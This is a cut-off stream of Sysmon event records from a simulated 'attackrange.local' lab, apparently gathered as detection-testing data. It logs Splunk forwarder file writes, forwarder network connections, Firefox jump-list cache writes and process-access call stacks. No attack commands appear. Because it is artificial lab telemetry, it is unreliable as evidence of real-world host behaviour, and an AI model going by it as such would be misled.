23542300x8000000000000000805846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:55.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FE73D609A1CB3E8F6B92337004447E5,SHA256=2308F6152AB30FCB7142BEB5C6330AC132908D9D8102FA155FAB858C69077CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:56.704{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:56.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83C989DBA22E4F9927F5EFAF1CDAF4F8,SHA256=DD432B020A37F434651FD888C6E2E63A49AA938714990C1CF81B42CDC406C06F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:56.154{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FED9A27CF889A4BDA7466230D508D047,SHA256=7ADA333081FF8846614A9BC3957DC9125FA12A8D33E366C3F605BE18B98842A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:56.224{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57138-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:57.247{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D3F6D67D30CD5B17FA7A653ED07F91,SHA256=F44BEA99DF64B510745F4837FA837D5382BF431D9A044D70FC70FA18A9915842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:57.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7743A6025505FAA614818069D0EC446B,SHA256=F96BC1DB7716C77F50525729ACAB726541C97AB5618E12774562866D15C9F1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:58.279{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=030CEA7010617F15AB156A18D351E397,SHA256=3F58B1506095E3AAF9008039278F02ECDA5D9C14C155968D9FBACBF898B105A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.640{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50886-false10.0.1.12-8000- 354300x80000000000000001045680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.240{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50885-false10.0.1.12-8089- 23542300x80000000000000001045679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:58.303{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130F05EF3C23C73796334C5C64004EE6,SHA256=84D5CFABD17DCCE79B7D0D5F067681A9FF5F197655634E35A2AA500C70A97422,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:58.050{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf60c9a0.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:59.334{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B414A8725C811E94D6C0EF72108DB945,SHA256=B24F7983BC1A6A856943F26018691BC3AE70191D9BB4D1E2B8C324FAE843DCFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:59.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E5851E3E73BAB7ABD2F495656E27129,SHA256=2D8CF257FF55ECAF6D25E17C2E65586D30AE65F8CE671CBD86EC22D07D54995C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001045707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001045706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001045705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001045704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf60d3b2.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\Zcu+SuGceoMw7jEKUb5oDw==.icoMD5=88B48CE20644063F896B4773C1AC1D91,SHA256=4910F163A5CD41C4B118E08ED3499191EFBE57CB26DF84BF39E71E71254404FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\xo8k2ky3GpHiI1pLvhaG2w==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\VBMHe4znoVL+YG5UjBj2Fg==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\v5zZN0gWxQQcSlsFXkjFSw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\uH_MCOVJ9Aduvu6vCVSCpQ==.icoMD5=88B48CE20644063F896B4773C1AC1D91,SHA256=4910F163A5CD41C4B118E08ED3499191EFBE57CB26DF84BF39E71E71254404FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\u7tfzr9UnZgBN9ofDX_SlQ==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\ThM2efvLQFClAZ6o2apafw==.icoMD5=5D981C37A2B6D1A11D7FEB87FE58D74B,SHA256=B87A03C2E30B1160D0C50F9E6DD18AF4298B21957368D8020D0A70319D4E78AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\tdLM+KOjWsfBYA7G0BW+zw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\SNLa1UNHrsKGK3H8U+id+w==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\sCeT886FgjTtZBVrjDjxlQ==.icoMD5=EE7F785510FFD6C4182979149AAB3F3E,SHA256=CDF8CABCD401B895306E04017C2AFDDC2D4D5FE48810BD5E4CC652B668CC5B65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\Q2sS3vx2J886sbGqfF7B2A==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\pV+3TL7Nu3EP5juvr_gPjg==.icoMD5=3179477007C6C6EF4023DFBC1FAD412E,SHA256=D1AF848123880D324A8B3D0404F40E19B195380364EFBFACF3126886234A8377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\OFVEIqzdBKeKpdOgW1or1g==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\ng2FLPaKpq7YK1yIWMPFRg==.icoMD5=5D981C37A2B6D1A11D7FEB87FE58D74B,SHA256=B87A03C2E30B1160D0C50F9E6DD18AF4298B21957368D8020D0A70319D4E78AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\MKk4smTa9mGSU6uvnGJXjw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\LlB9BoUNa4ZtudtaDQs1yA==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\IP0wnRTpLv_qsq4nlNF5zw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\GCPFYDP8YS_iRU8ht6aUMA==.icoMD5=1A25BD5A01EC04884A81344CEFFDA24C,SHA256=49633BA947E721A8EF218137A24A9874C6B49F4E374C5F304975DAE1B5EFF166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.587{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\cpEbUHld0HIDZebvGsX43A==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.587{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\11J3zf_vmVpGrlm9rvHbhg==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.349{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DCD74D609E26B730E197CE83191BDC0,SHA256=EF2DD642D9B103B9D0CC9282BC72E45D55B27193D4A1F9DBAB1BB7921BE80164,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:00.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C979A4BB845711763459C79955D7EF4,SHA256=05845186161895CB454BCBB2D973A47ACF2D57E54029E95DD24A048A65BC2C65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:01.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A13215F81CC157B2A4D8133CBD83D0FA,SHA256=FFDDA4E7D1EAED3BE6A8667ED0C6F544B749FC7E17EA91C57B03AF3E1E6462B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:01.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=020C79EC95600E9E2035EC3C119DFD81,SHA256=18762B5EA51B02E6147D1A76808A853EED61F7C1C7FBC8735E5F8F91DA5E3397,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:02.603{466BC892-02B0-60E8-1600-00000000CF01}130496C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 